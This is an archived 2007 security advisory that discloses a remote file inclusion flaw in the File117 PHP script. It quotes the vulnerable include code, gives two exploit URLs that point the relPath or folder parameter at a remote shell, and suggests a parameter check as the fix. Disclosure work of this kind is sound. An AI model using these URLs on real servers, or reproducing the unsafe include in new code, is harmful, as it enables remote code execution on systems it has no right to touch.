File117 Remote File Inclusion Apr 22 2007 06:50PM
InyeXion gmail com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~
File117 Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~
Affected Software .: File117
Download..: http://www.sinato.com/jmuffin/upload/file117.zip
Risk ..............: high
Found by ..........: InyeXion
Contact ...........: InyeXion[at]gmail.com
Web .............: Www.InyeXion.com.ar
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~

Affected File:
/html/php/detail.php

Vulnerable Code:

<?php
include_once("phpInterface.php");
$$cmname=$cm;
include($relPath.$folder."/".$templatename);
?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~
Exploit:

http://[target]/html/php/detail.php?relPath=[shell]?
http://[target]/html/php/detail.php?folder=[shell]?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~

Fixed bug:

if((isset($_REQUEST['relPath']) || isset($_GET['relPath']) || isset($_POST['relPath'])) && !defined("relPath")){
die("denied access"); }

AND

if((isset($_REQUEST['folder']) || isset($_GET['folder']) || isset($_POST['folder'])) && !defined("folder")){
die("denied access"); }

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus